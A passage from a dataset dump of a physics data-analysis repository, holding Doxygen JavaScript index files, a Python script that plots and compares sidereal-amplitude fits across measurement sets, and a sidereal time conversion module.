\"SPfuncs_8py\" ],\n [ \"SPgraphs.py\", \"SPgraphs_8py.html\", \"SPgraphs_8py\" ],\n [ \"test_SPfuncs.py\", \"test__SPfuncs_8py.html\", \"test__SPfuncs_8py\" ]\n];" }, { "alpha_fraction": 0.5663265585899353, "alphanum_fraction": 0.6581632494926453, "avg_line_length": 55, "blob_id": "8cc0ae5099ff8160ed25074bc1de3e5703ebb996", "content_id": "e3b60c3c9af58a7f34f72fff359505fe9fc72bc8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", 
"length_bytes": 392, "license_type": "no_license", "max_line_length": 183, "num_lines": 7, "path": "/html/search/all_b.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var searchData=\n[\n ['object',['object',['../classobject.html',1,'']]],\n ['opencpt_2epy',['openCPT.py',['../openCPT_8py.html',1,'']]],\n ['openfile',['openFile',['../namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1openCPT.html#a123c419a688aefb0d6d482eca7512d36',1,'repo::programs::pythonpackages::pr::openCPT']]],\n ['openmotor_2epy',['openMotor.py',['../openMotor_8py.html',1,'']]]\n];\n" }, { "alpha_fraction": 0.5008272528648376, "alphanum_fraction": 0.7445048689842224, "avg_line_length": 78.84906005859375, "blob_id": "cac8c01e044f6d22581611bf0ed9fb9f77b8e0d4", "content_id": "6a18e5dd45d921eb872429e7b9c3c7c55d32a708", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 4231, "license_type": "no_license", "max_line_length": 98, "num_lines": 53, "path": "/html/SPfuncs_8py.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var SPfuncs_8py =\n[\n [ \"addFakeData\", \"SPfuncs_8py.html#a9cc828a26b8f8d72c9c5c86bd951f8e8\", null ],\n [ \"combine_angle_amps\", \"SPfuncs_8py.html#adb6ea3b115ad55320acf0ef8f3ee76eb\", null ],\n [ \"filterBySensors\", \"SPfuncs_8py.html#aefa37b595edec764011c69c3202787f6\", null ],\n [ \"getAnglesFromRSpec\", \"SPfuncs_8py.html#a2533afa952ea007cfad4a1deb6a607a5\", null ],\n [ \"getHarmonicsFit\", \"SPfuncs_8py.html#a7590e0785adc48ccbabea8d0eccda514\", null ],\n [ \"getRotationsFromRSpec\", \"SPfuncs_8py.html#aba724f914a5cc838851518564a1f5d84\", null ],\n [ \"group_by_axis\", \"SPfuncs_8py.html#a5a727d85f97fb1e1e7370fbca3b1d1ea\", null ],\n [ \"makeTestData\", \"SPfuncs_8py.html#ae90ba18ae292290722e197cf242d8721\", null ],\n [ \"makeTriggers\", \"SPfuncs_8py.html#af8a48b74a6d4e725e2409329126076a6\", null ],\n [ \"mgStringHarmonics\", \"SPfuncs_8py.html#a154be474c56db17750f8232efe410d54\", null ],\n [ \"preprocess_raw\", \"SPfuncs_8py.html#aa45dbb6291e4944f3ba2718a3d0ee001\", null ],\n [ \"process_continuous_raw\", \"SPfuncs_8py.html#a9ae89d50fa931a7cc863400505be38b1\", null ],\n [ \"process_points\", \"SPfuncs_8py.html#a7265a1148ca13e5fb7961b297a214d13\", null ],\n [ \"process_raw\", \"SPfuncs_8py.html#a5d91f2e7930fdc007f010659068307f9\", null ],\n [ \"process_sequences\", \"SPfuncs_8py.html#a98d08fa254a21b0b0895f424f7006dbd\", null ],\n [ \"process_sequences_multifit\", \"SPfuncs_8py.html#aa986fff9d1f1b5354e43e972289e5844\", null ],\n [ \"renameFieldMaybe\", \"SPfuncs_8py.html#acb6d178d4325b6c3d8fec4f8197d6819\", null ],\n [ \"rotate_sequence_amps\", \"SPfuncs_8py.html#a792112113be3784fc089059c6eed4ff1\", null ],\n [ \"sd2secs\", \"SPfuncs_8py.html#aca5c571c3ee666190d0568fbcd72f1a9\", null ],\n [ \"secs2sd\", \"SPfuncs_8py.html#a9d03b1e8bb9325cdab8fa026d6cdbbe3\", null ],\n [ \"sliceReduceData\", \"SPfuncs_8py.html#afac5173c60ef10bac3b5eafb40f7efef\", null ],\n [ \"sliceSorted\", \"SPfuncs_8py.html#a87aac33304db20fd58d7a3625061cca6\", null ],\n [ \"split_and_process_sequences\", \"SPfuncs_8py.html#ae43119e40ee34e8e5f67a1088548adb6\", null ],\n [ \"spSearchSet\", \"SPfuncs_8py.html#a1aca1da7012fa44af8ba6fb057c7ed1b\", null ],\n [ \"stringSimple3pt\", \"SPfuncs_8py.html#a7fb1286952274a8a185975238894be9d\", null ],\n [ \"stringSimple5pt\", \"SPfuncs_8py.html#a26157a1627869c31bfa6e494e5caf311\", null ],\n [ \"subtract_correlations\", 
\"SPfuncs_8py.html#ae33ce81936d04fd605560ec75ffe4a12\", null ],\n [ \"view_correlation_filtering\", \"SPfuncs_8py.html#af195e86c16fec9d60d1ac20dbe5d1f19\", null ],\n [ \"view_correlations\", \"SPfuncs_8py.html#a45a8e352a69cc8a225a32134c87cd120\", null ],\n [ \"view_raw\", \"SPfuncs_8py.html#a9c4d4bc9bf9302d2690f560af0d9982b\", null ],\n [ \"view_sidereal\", \"SPfuncs_8py.html#a40e964ab0b81bcee6065cfa0b5bde422\", null ],\n [ \"bTest\", \"SPfuncs_8py.html#a47dc9e4b5eebaf862bdd545eaff5c371\", null ],\n [ \"CorrelationData\", \"SPfuncs_8py.html#a97ee543cf8ac7b27443cbfe8ff2e20f3\", null ],\n [ \"D\", \"SPfuncs_8py.html#ae11ccbd488015737fccc78456a5a112f\", null ],\n [ \"dat\", \"SPfuncs_8py.html#a68243cfba6d3074cf6381b76546eec71\", null ],\n [ \"ds\", \"SPfuncs_8py.html#a5e62fc21df71cfdd96a1c0048b264295\", null ],\n [ \"LabSetData\", \"SPfuncs_8py.html#a98ebdcd3ceb3fa1b7bc74e8caf64b50d\", null ],\n [ \"N\", \"SPfuncs_8py.html#aaea13a6ab57b30bea3669d56fd489e30\", null ],\n [ \"nameL\", \"SPfuncs_8py.html#a7fe775d9cf2e94f97127d699a8b92579\", null ],\n [ \"PointData\", \"SPfuncs_8py.html#a1ffb0a48d6d36a1260a65e82c4604ce2\", null ],\n [ \"RawData\", \"SPfuncs_8py.html#a29a04cecefb141502380f4e43bc1d06d\", null ],\n [ \"res\", \"SPfuncs_8py.html#ab8ea55b3a0adfc5e8090a9a40db96e5a\", null ],\n [ \"RotationSpec\", \"SPfuncs_8py.html#abeb96363789885a36812850590fbfbab\", null ],\n [ \"rSpec\", \"SPfuncs_8py.html#a0fa8a32d68b3b6a1486926b952bd3676\", null ],\n [ \"SiderealFitData\", \"SPfuncs_8py.html#a8dd105859db0f7ebef805efb3c08dfb7\", null ],\n [ \"t\", \"SPfuncs_8py.html#ae6715e84e2c13a885096710a851aba3a\", null ],\n [ \"timestamps\", \"SPfuncs_8py.html#ab1cf4f0f232b2ccd32f08baa27263f1b\", null ],\n [ \"trigTimes\", \"SPfuncs_8py.html#a165fa263d040e95cba983de350ee563f\", null ],\n [ \"Window\", \"SPfuncs_8py.html#a5f881c246a0ac49955b33746df6c379b\", null ],\n [ \"window\", \"SPfuncs_8py.html#a4dc94cbb119a397cfee47da5a4681676\", null ]\n];" }, { "alpha_fraction": 0.4783715009689331, "alphanum_fraction": 0.7379134893417358, "avg_line_length": 72.71875, "blob_id": "4e90b51c79cb0f4ae1996d8866ed2064b608e960", "content_id": "151e5e486a5da7b21dec6e84bd285782d39ef52f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2358, "license_type": "no_license", "max_line_length": 86, "num_lines": 32, "path": "/html/SPgraphs_8py.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var SPgraphs_8py =\n[\n [ \"analyseBy\", \"SPgraphs_8py.html#ac526cfdccd3db288e299b42806782f66\", null ],\n [ \"bgSub\", \"SPgraphs_8py.html#aa9ac03de8263ce020d5549a803aa2ec6\", null ],\n [ \"byDay\", \"SPgraphs_8py.html#ae66d67a1bdf6628e901a61a60a2ed75e\", null ],\n [ \"bySet\", \"SPgraphs_8py.html#a898320c98ec7a312c6a1d746636ec0be\", null ],\n [ \"bySetEarly\", \"SPgraphs_8py.html#a69817958c436311d169582bdc6f2c5cf\", null ],\n [ \"bySetLate\", \"SPgraphs_8py.html#ac4f9ba0c7d5b5bfadded9af98ee6890c\", null ],\n [ \"bySetSplit\", \"SPgraphs_8py.html#ae5d9b9902d318a31b3eb63b2063417de\", null ],\n [ \"directCompare\", \"SPgraphs_8py.html#a16e1ef7ee56ff5db216016a0a60cc909\", null ],\n [ \"dividedUp\", \"SPgraphs_8py.html#ad33224264e0377c3a57e53584e4c57e3\", null ],\n [ \"edit_infos\", \"SPgraphs_8py.html#a0b2bbf659ee5ec02aa5cb7daad91c280\", null ],\n [ \"EW\", \"SPgraphs_8py.html#a411259eb0330302f50db7c7f60330289\", null ],\n [ \"EWSplit\", \"SPgraphs_8py.html#aa915e36691f2aa1531d635c703e12d00\", null ],\n [ \"NS\", 
\"SPgraphs_8py.html#a629861d51c67e4ca35a7812367b67734\", null ],\n [ \"NSEW\", \"SPgraphs_8py.html#ac4784095475c5528bbf7b16553e32f69\", null ],\n [ \"NSEWSplit\", \"SPgraphs_8py.html#ad12531edaf503e50679f06d185f67f3b\", null ],\n [ \"NSSplit\", \"SPgraphs_8py.html#ac48db354437f1d670e7f339066acd8e3\", null ],\n [ \"plotAllSeq\", \"SPgraphs_8py.html#ab6f44a36f6d42154485b43e73c4eccf2\", null ],\n [ \"plotAllSyst\", \"SPgraphs_8py.html#a7c2c5cf3d0cd43b5b3cd9876f30fd51f\", null ],\n [ \"polDn\", \"SPgraphs_8py.html#a3ec55dabf6134d7fff5d974ff35af920\", null ],\n [ \"polDnSplit\", \"SPgraphs_8py.html#ac63344d1aeb7aa62c61dd21af0bb093d\", null ],\n [ \"polUp\", \"SPgraphs_8py.html#a7b29c4cfd4985b53c2ee0a982eec3760\", null ],\n [ \"polUpSplit\", \"SPgraphs_8py.html#a697fa8b8c89c0679ddea4fe27fa68714\", null ],\n [ \"Rot45\", \"SPgraphs_8py.html#a4d2979e542eb057ea841c0405afdc762\", null ],\n [ \"Rot45Split\", \"SPgraphs_8py.html#a7ee3da3bf8fa5dbbe668d1ec1417b62f\", null ],\n [ \"systComparison\", \"SPgraphs_8py.html#aebd49435534649c324ad4143d7f92a34\", null ],\n [ \"test\", \"SPgraphs_8py.html#a25db38c12dcefd76294477b9cd9eaf77\", null ],\n [ \"dsL\", \"SPgraphs_8py.html#a3308a4df9ead1d33bd7d39b4f686e118\", null ],\n [ \"figdir\", \"SPgraphs_8py.html#a0c498d7244fa703a63be3bb92d8b9a04\", null ],\n [ \"timestampL\", \"SPgraphs_8py.html#a04e4e5bc22270694ea4fbca149c08f09\", null ]\n];" }, { "alpha_fraction": 0.5644538998603821, "alphanum_fraction": 0.6002187132835388, "avg_line_length": 29.904573440551758, "blob_id": "50d75a61d1dceebca8632a0bce90235c1ba2a20a", "content_id": "c7d2a53286fc352b3686cd0d5310c638ad86d975", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15546, "license_type": "no_license", "max_line_length": 168, "num_lines": 503, "path": "/SPgraphs.py", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "\"\"\"\nTODO:\n Need to actually calculate c, b coefficients and plot them. 
Initially this can just involve multiplying or not multiplying by the polarisation in the final result\n\"\"\"\nimport matplotlib as mpl\nmpl.rcParams['figure.figsize']=[13,11]\nfrom pylab import *\nimport SPDataSet as sd\nimport SPfuncs as spf\nimport pdb\nfrom MT import vprint\nfrom functools import partial\nfigdir='figs2'\n\n#2013 Data\ntimestampL=[\n'4803.31',\n'4812.51',\n'4818.33',\t\n'4827.26',\n'4833.40',\n'4834.39',\n'4838.50',\n'4840.65',\n'4850.54',\n'4857.47',\n'4859.39',\n'4864.65',\n'4865.75',\n'4867.48',\n'4868.41',\n'4869.74',\n'4876.97',\n'4881.71',\n'4885.53',\n'4888.50',\n'4889.50',\n'4894.57',\n'4898.68',\n'4901.78',\n'4902.85',\n'4903.58',\n'4906.58',\n'4911.09',\n'4914.07',\n'4929.88',\n'4938.05',\n'4945.09',\n'4953.70',\n'4959.91',\n'4966.95',\n]\n#timestampL=timestampL[:-6]\n\ntimestampL=[\n #'5209.26',\n #'5240.33',\n '5249.72',\n '5273.74',\n '5282.23',\n #'5292.71',\n '5294.31',\n #'5296.33',\n '5310.41',\n #'5318.41',\n '5348.82',\n '5369.87',\n '5386.02',\n '5390.74',\n '5410.04',\n '5410.87',\n '5411.92',\n '5415.95',\n '5420.00',\n #'5421.02',\n #'5422.00',\n '5422.80',\n '5424.94',\n]\ndsL=[sd.SPDataSet(ts) for ts in timestampL]\n\ndef edit_infos(dsLin=None):\n \"\"\"Walk through the datasets and display their metadata for editing/viewing\n \"\"\"\n if dsLin is None:\n dsLin =dsL\n\n for ds in dsLin:\n ds.edit_set_info()\n raw_input(\"Enter for next\")\n\nimport copy\ndef combinedD(d1, d2):\n out=copy.copy(d1); out.update(d2)\n return out\nNdiv=10\ndef analyseBy(datSetL=None, sidAmpDict={}, dsModifyF=None, generalF=None, plot=False):\n sidAmpL=[]\n if datSetL is None:\n datSetL=dsL\n for ds in datSetL:\n try:\n if dsModifyF is not None:\n ds, D=dsModifyF(ds, sidAmpDict)\n else:\n D=sidAmpDict\n #D= sidAmpDict(ds) if callable(sidAmpDict) else sidAmpDict\n\n if generalF is not None:\n amp=generalF(ds, D)\n else:\n amp=ds.sidAmp(**D)\n if amp is not None and not hasattr(amp, 't'):\n sidAmpL.extend(amp)\n else:\n sidAmpL.append(amp)\n\n except (ZeroDivisionError, ValueError):\n sys.exc_clear()\n #pass #Failed probably because there was no data, so we won't add it to the list\n #figure('Pol dn (split)')\n if not hasattr(plot, 'draw') and plot==True:\n figure()\n plot=gca()\n return spf.combine_angle_amps(sidAmpL, plot), sidAmpL\n\ndef polUp(plot=False, **kwargs):\n sidAmpL=[]\n #for ts in timestampL:\n for ds in dsL:\n #ds=sd.SPDataSet(ts)\n sidAmpL.append(ds.sidAmp(genSeqFiltF=sd.genSeqFiltPol(1),**kwargs))\n figure('Pol up (by set)')\n ax=gca()\n return spf.combine_angle_amps(sidAmpL,plot)\n\ndef polDn(plot=False, **kwargs):\n sidAmpL=[]\n for ds in dsL:#timestampL:\n #ds=sd.SPDataSet(ts)\n sidAmpL.append(ds.sidAmp(genSeqFiltF=sd.genSeqFiltPol(-1),**kwargs))\n figure('Pol dn (by set)')\n ax=gca()\n return spf.combine_angle_amps(sidAmpL,plot)\n\ndef polUpSplit(plot=False, **kwargs):\n sidAmpL=[]\n #for ts in timestampL:\n for ds in dsL:\n try:\n mn, calcedUnc, apparentUnc, wEr=spf.combine_angle_amps(\n ds.sidAmp(sd.seqFiltFuncInterleave(Ndiv), genSeqFiltF=sd.genSeqFiltPol(1), **kwargs)\n )\n sidAmpFull=ds.sidAmp()\n sidAmpL.append(spf.SiderealFitData(t=sidAmpFull.t, sig=mn, err=diag(apparentUnc)**2, chi2=None, sidTheta=sidAmpFull.sidTheta, labTheta=sidAmpFull.labTheta))\n\n except (ZeroDivisionError, ValueError):\n sys.exc_clear()\n #pass #Failed probably because there was no data, so we won't add it to the list\n #figure('Pol up (split)')\n return spf.combine_angle_amps(sidAmpL, gca())\n\ndef polDnSplit(plot=False, **kwargs):\n sidAmpL=[]\n #for ts in 
timestampL:\n for ds in dsL:\n try:\n mn, calcedUnc, apparentUnc, wEr=spf.combine_angle_amps(\n ds.sidAmp(sd.seqFiltFuncInterleave(Ndiv), genSeqFiltF=sd.genSeqFiltPol(-1), **kwargs)\n )\n sidAmpFull=ds.sidAmp()\n sidAmpL.append(spf.SiderealFitData(t=sidAmpFull.t, sig=mn, err=diag(apparentUnc)**2, chi2=None, sidTheta=sidAmpFull.sidTheta, labTheta=sidAmpFull.labTheta))\n\n except (ZeroDivisionError, ValueError):\n sys.exc_clear()\n #pass #Failed probably because there was no data, so we won't add it to the list\n #figure('Pol dn (split)')\n return spf.combine_angle_amps(sidAmpL, gca())\n\ndef byDay(plot=False, **kwargs):\n #By day\n sidAmpL=[]\n for ds in dsL:\n #ds=sd.SPDataSet(ts)\n print(\"timestamp: {}\".format(ds.timestamp))\n sdL=ds.sidAmp(sd.seqFiltFuncTime(), **kwargs)\n if sdL is not None:\n if hasattr(sdL,'t'):\n sidAmpL.append(sdL)\n else:\n sidAmpL.extend(sdL)\n #if len(sidAmpL)==15:\n # pdb.set_trace()\n ds._cache.clear()\n #wtMn, calcedUnc, apparentUnc, wtErr= spf.combine_angle_amps(sidAmpL)\n #(ths, ys, covs)= zip(*[ MT.rotate_quadrature_sample(sAmp.labTheta, sAmp.sig, sAmp.err) for sAmp in ampL])\n\n #ys=array(ys)\n #ts=array(ts)\n #errs=array([sqrt(cov.diagonal()) for cov in covs]) #cheat and throw away covariance\n\n #figure()\n #for t, y, e in zip(ts.T, ys.T, errs.T):\n # errorbar( t, y, e, fmt='.') #Probaby not quite right\n #figure('By day')\n ax=gca()\n #mn, calcedUnc, apparentUnc, wEr=spf.combine_angle_amps(sidAmpl)\n return spf.combine_angle_amps(sidAmpL,plot)\n\ndef bySetEarly(plot=False, **kwargs):\n sidAmpL=[]\n for ds in dsL:\n #ds=sd.SPDataSet(ts)\n win=ds.set_info['windows']['sig']\n \n win['duration']=win['duration']/2\n sidAmpL.append(ds.sidAmp(sigWindow=spf.Window(**win)))\n #figure('Early')\n ax=gca()\n\n return spf.combine_angle_amps(sidAmpL,plot)\ndef bySetLate(plot=False, **kwargs):\n sidAmpL=[]\n for ds in dsL:\n #ds=sd.SPDataSet(ts)\n win=ds.set_info['windows']['sig']\n #win=win._replace(offset=win.offset+win.duration/2)\n win['offset']=win['offset']+win['duration']/2\n #win=win._replace(duration=win.duration/2)\n win['duration']=win['duration']/2\n sidAmpL.append(ds.sidAmp(sigWindow=spf.Window(**win)))\n #figure('Late')\n ax=gca()\n return spf.combine_angle_amps(sidAmpL,plot)\n\ndef bySetSplit(plot=False, ):\n sidAmpL=[]\n for ds in dsL:\n #ds=sd.SPDataSet(ts)\n mn, calcedUnc, apparentUnc, wEr=spf.combine_angle_amps(ds.sidAmp(sd.seqFiltFuncInterleave(Ndiv)))\n sidAmpFull=ds.sidAmp()\n sidAmpL.append(spf.SiderealFitData(t=sidAmpFull.t, sig=mn, err=diag(apparentUnc)**2, chi2=None, sidTheta=sidAmpFull.sidTheta, labTheta=sidAmpFull.labTheta))\n #figure('By set, split-up')\n ax=gca()\n return spf.combine_angle_amps(sidAmpL,plot)\n\ndef bgSub(plot=False, ):\n sidAmpL=[]\n for ds in dsL:\n #ds=sd.SPDataSet(ts)\n sidAmpL.append(ds.sidAmp(subtractWindow='bg'))\n #figure('BG subtracted')\n ax=gca()\n return spf.combine_angle_amps(sidAmpL,plot)\n\ndef bySet(plot=False, **kwargs):\n sidAmpL=[]\n for ds in dsL:\n #ds=sd.SPDataSet(ts)\n print(\"timestamp: {}\".format(ds.timestamp))\n sAmp=ds.sidAmp(**kwargs)\n if hasattr(sAmp, 't'):\n sidAmpL.append()\n else: \n sidAmpL.extend(sAmp)\n ds._cache.clear()\n #figure('By set')\n ax=gca()\n return spf.combine_angle_amps(sidAmpL,plot), sidAmpL\n\ndef dividedUp(plot=False, ):\n sidAmpL=[]\n for ds in dsL:\n #ds=sd.SPDataSet(ts)\n sidAmpL.extend(ds.sidAmp(sd.seqFiltFuncInterleave(Ndiv)))\n #figure('split up')\n ax=gca()\n return spf.combine_angle_amps(sidAmpL,plot)\n\ndef NS(plot=False, **kwargs):\n sidAmpL=[]\n for ds in 
dsL:\n #ds=sd.SPDataSet(ts)\n sidAmpL.append(ds.sidAmp(sd.seqFiltFuncAxis(0), label='NS Only', **kwargs))\n #figure('NS (by set)')\n ax=gca()\n return spf.combine_angle_amps(sidAmpL,plot)\n\ndef EW(plot=False, **kwargs):\n sidAmpL=[]\n for ds in dsL:\n #ds=sd.SPDataSet(ts)\n sidAmpL.append(ds.sidAmp(sd.seqFiltFuncAxis(pi/2), label='EW only', **kwargs))\n #figure('EW (by set)')\n ax=gca()\n return spf.combine_angle_amps(sidAmpL,plot)\n\ndef EWSplit(plot=False, **kwargs):\n sidAmpL=[]\n def filt(seqAmp):\n return sd.seqFiltFuncInterleave(Ndiv)(sd.seqFiltFuncAxis(pi/2)(seqAmp))\n for ds in dsL:\n try:\n mn, calcedUnc, apparentUnc, wEr=spf.combine_angle_amps(\n ds.sidAmp(filtF=filt, **kwargs)\n )\n sidAmpFull=ds.sidAmp()\n sidAmpL.append(spf.SiderealFitData(t=sidAmpFull.t, sig=mn, err=diag(apparentUnc)**2, chi2=None, sidTheta=sidAmpFull.sidTheta, labTheta=sidAmpFull.labTheta))\n except (ZeroDivisionError, ValueError):\n sys.exc_clear()\n #pass #Failed probably because there was no data, so we won't add it to the list\n #figure('EW (split)')\n return spf.combine_angle_amps(sidAmpL, gca())\n\ndef NSSplit(plot=False, **kwargs):\n sidAmpL=[]\n def filt(seqAmp):\n return sd.seqFiltFuncInterleave(Ndiv)(sd.seqFiltFuncAxis(0)(seqAmp))\n for ds in dsL:\n try:\n mn, calcedUnc, apparentUnc, wEr=spf.combine_angle_amps(\n ds.sidAmp(filtF=filt, **kwargs)\n )\n sidAmpFull=ds.sidAmp()\n sidAmpL.append(spf.SiderealFitData(t=sidAmpFull.t, sig=mn, err=diag(apparentUnc)**2, chi2=None, sidTheta=sidAmpFull.sidTheta, labTheta=sidAmpFull.labTheta))\n except (ZeroDivisionError, ValueError):\n sys.exc_clear()\n #pass #Failed probably because there was no data, so we won't add it to the list\n #figure('NS (split)')\n return spf.combine_angle_amps(sidAmpL, gca())\n\ndef NSEW(plot=False,):\n sidAmpL=[]\n for ds in dsL:\n #vprint(ts)\n #ds=sd.SPDataSet(ts)\n sidAmpL.append(ds.sidAmp(sd.seqFiltFunc2Axes(0)))\n #figure('NSEW (by set)')\n ax=gca()\n return spf.combine_angle_amps(sidAmpL,plot)\n\ndef NSEWSplit(plot=False, **kwargs):\n sidAmpL=[]\n def filt(seqAmp):\n return sd.seqFiltFuncInterleave(Ndiv)(sd.seqFiltFunc2Axes(0)(seqAmp))\n for ds in dsL:\n try:\n mn, calcedUnc, apparentUnc, wEr=spf.combine_angle_amps(\n ds.sidAmp(filtF=filt, **kwargs)\n )\n sidAmpFull=ds.sidAmp()\n sidAmpL.append(spf.SiderealFitData(t=sidAmpFull.t, sig=mn, err=diag(apparentUnc)**2, chi2=None, sidTheta=sidAmpFull.sidTheta, labTheta=sidAmpFull.labTheta))\n except (ZeroDivisionError, ValueError):\n sys.exc_clear()\n #pass #Failed probably because there was no data, so we won't add it to the list\n #figure('NSEW (split)')\n return spf.combine_angle_amps(sidAmpL, gca())\n\ndef Rot45Split(plot=False, **kwargs):\n sidAmpL=[]\n def filt(seqAmp):\n return sd.seqFiltFuncInterleave(Ndiv)(sd.seqFiltFunc2Axes(pi/4)(seqAmp))\n for ds in dsL:\n try:\n mn, calcedUnc, apparentUnc, wEr=spf.combine_angle_amps(\n ds.sidAmp(filtF=filt, **kwargs)\n )\n sidAmpFull=ds.sidAmp()\n sidAmpL.append(spf.SiderealFitData(t=sidAmpFull.t, sig=mn, err=diag(apparentUnc)**2, chi2=None, sidTheta=sidAmpFull.sidTheta, labTheta=sidAmpFull.labTheta))\n except (ValueError, ZeroDivisionError):\n sys.exc_clear()\n #pass #Failed probably because there was no data, so we won't add it to the list\n #figure('Rot45 (split)')\n return spf.combine_angle_amps(sidAmpL, gca())\n\ndef Rot45(plot=False, ):\n sidAmpL=[]\n for ds in dsL:#timestampL:\n sidAmpL.append(ds.sidAmp(sd.seqFiltFunc2Axes(pi/4)))\n #figure('rot45 (by set)')\n #ax=gca()\n return spf.combine_angle_amps(sidAmpL, plot)\n\nsystL=[\n 
('set', bySet),\n ('setVertSub', partial(bySet, coFitL='med:Vert Pos Det 2')),\n ('day', byDay),\n ('dayVertSub', partial(byDay, coFitL='med:Vert Pos Det 2')),\n ('sets_S', bySetSplit),\n ('alldivided', dividedUp),\n ('bgSub', bgSub),\n ]\nportionL=[\n ('axes0', NSEW),\n ('axes45', Rot45),\n ('EW', EW),\n ('NS', NS),\n ('polUp', polUp),\n ('polDn', polDn),\n ('setEarly', bySetEarly),\n ('setLate', bySetLate),\n ]\nportionSplitL=[\n ('axes0_S', NSEWSplit),\n ('axes45_S', Rot45Split),\n ('EW_S', EWSplit),\n ('NS_S', NSSplit),\n ('polUp_S', polUpSplit),\n ('polDn_S', polDnSplit),\n #('setEarly', bySetEarlySplit),\n #('setLate', bySetLateSplit),\n ]\n\ndef directCompare():\n L=portionL\n for k in range(len(L)/2):\n name1, f1=L[2*k]\n name2, f2=L[2*k+1]\n fig=figure(name1 + ' vs ' + name2)\n ax1=subplot(211)\n ax2=subplot(212)\n f1(plot=[ax1,ax2])\n f2(plot=[ax1,ax2])\n fig.savefig(figdir+'/{} vs {}.pdf'.format(name1,name2))\n\ndef systComparison(L, axL=None):\n labels, dat=zip(*[(label, f()) for label, f in L])\n mnL, trustUncL, apparentUncL, wErL = zip(*dat)\n mnL=array(mnL);\n trustUncL=array(trustUncL);\n apparentUncL=array(apparentUncL)\n if axL==None:\n figure()\n ax1=gca()\n figure()\n ax2=gca()\n axL=[ax1, ax2]\n else:\n ax1,ax2=axL\n\n xpos=arange(len(mnL))\n k=0\n for mn, appUnc, trustUnc, ax in zip(mnL.T, apparentUncL.T, trustUncL.T, axL):\n ax.errorbar(xpos, mn, appUnc, fmt='o', elinewidth=2, capthick=2) \n ax.errorbar(xpos, mn, trustUnc, fmt=None, elinewidth=2, capthick=2) \n ax.set_xticks(xpos)\n ax.set_xticklabels(labels)\n ax.set_xlim([-0.5, len(mnL)+0.5])\n ax.set_ylabel('fT')\n ax1.set_title('x-quad')\n ax2.set_title('y-quad')\n ax1.grid(True)\n ax2.grid(True)\n return labels, dat\n\ndef plotAllSyst():\n k=1\n for L in [systL, portionL, portionSplitL]: \n fig=figure()\n ax1=subplot(211)\n ax2=subplot(212)\n systComparison(L,[ax1,ax2])\n fig.savefig(figdir+'/systematic {}.pdf'.format(k))\n k+=1\n\ndef plotAllSeq():\n for ds in dsL:\n ds.viewSeq()\n tight_layout()\n savefig(figdir+\"/{0}:corr.png\".format(ds.timestamp))\n\n ds.viewSeq(sigWindow='bg')\n tight_layout()\n savefig(figdir+\"/{0}:corr_bg.png\".format(ds.timestamp))\n\n ds.viewCorrelationFilt()\n tight_layout()\n savefig(figdir+\"/{0}:corr_filt.png\".format(ds.timestamp))\n ds.clearRaw()\n\ndef test():\n ds=sd.SPDataSet('5369.87')\n sAmp1=ds.sequenceAmp(sigWindow=spf.Window(2.5,-5.5))\n sAmp2=ds.sequenceAmp(sigWindow=spf.Window(2.5,-3))\n pAmp1=ds.pointAmp(sigWindow=spf.Window(2.5,-5.5))\n pAmp2=ds.pointAmp(sigWindow=spf.Window(2.5,-3))\n\n #sAmp1=ds.sequenceAmp(sigWindow=spf.Window(3.25,-6.5))\n #sAmp2=ds.sequenceAmp(sigWindow=spf.Window(3.25,-3.25))\n #pAmp1=ds.pointAmp(sigWindow=spf.Window(3.25,-6.5))\n #pAmp2=ds.pointAmp(sigWindow=spf.Window(3.25,-3.25))\n\n sig1=sAmp1.sig.ravel()\n sig2=sAmp2.sig.ravel()\n err1=sAmp1.err.ravel()\n err2=sAmp2.err.ravel()\n t=sAmp1.t.ravel()\n figure()\n fit, (ax1,ax2)=subplots(2,1, sharex=True)\n ax1.plot(pAmp1.t.ravel(), pAmp1.sig.ravel())\n ax1.plot(pAmp2.t.ravel(), pAmp2.sig.ravel())\n ax2.errorbar(t, sig1, err1, fmt='.')\n ax2.errorbar(t, sig2, err2, fmt='.')\n\n" }, { "alpha_fraction": 0.5400130152702332, "alphanum_fraction": 0.6636304259300232, "avg_line_length": 29.13725471496582, "blob_id": "4bfbde20b74e437619ac849a92ff93de94e03488", "content_id": "22bfe0bcc7a04e244f41b2e946443304a3fb1d1a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1537, "license_type": "no_license", "max_line_length": 156, "num_lines": 51, 
"path": "/sdtime.py", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "from __future__ import division\nfrom math import floor\nimport time\n#y2000=time.struct_time([2000,1,0,0,0,0,0,0,0]);\ny2000secs= 946684800# time.mktime(y2000);\nsecsPerSidDay= 86164.0905#( 23.9344696*3600);\nFF=0.277715#0.7222841#*0.2776;\n\ndef secs2sd(t):\n return (t-y2000secs)/secsPerSidDay + FF #Fudge factor for some reason\ndef sd2secs(sd):\n return (sd-FF)*secsPerSidDay+y2000secs\ndef sd2gm(sd):\n return time.gmtime(sd2secs(sd))\ndef sd2local(sd):\n return time.localtime(sd2secs(sd))\ndef sdNow():\n return secs2sd(time.time());\ndef loc2sd(ltime_str, fmt=None):\n #raise NotImplementedError\n if fmt:\n ltime=time.strptime(ltime_str, fmt)\n elif fmt is None:\n fmt='%m %d %Y'\n try:\n ltime=time.strptime(ltime_str, fmt)\n except ValueError:\n fmt='%c'\n ltime=time.strptime(ltime_str,fmt)\n return secs2sd(time.mktime(ltime))\n \n\n\ndef solarDaysSinceY2000(unixTime=None):\n if unixTime==None:\n unixTime=time.time();\n return (unixTime + 3029572800.)/86400.\n\ndef siderealTimeKornack(unixTime=None):\n return (280.46061837 + 360.98564736629 * solarDaysSinceY2000(unixTime))/360.;\n\ndef siderealTimeMeesus(T=None):\n if T==None:\n T=time.gmtime()\n return 367*T.tm_year-floor(7*(T.tm_year+floor((T.tm_mon+9)/12))/4)+floor(275*T.tm_mon/9) 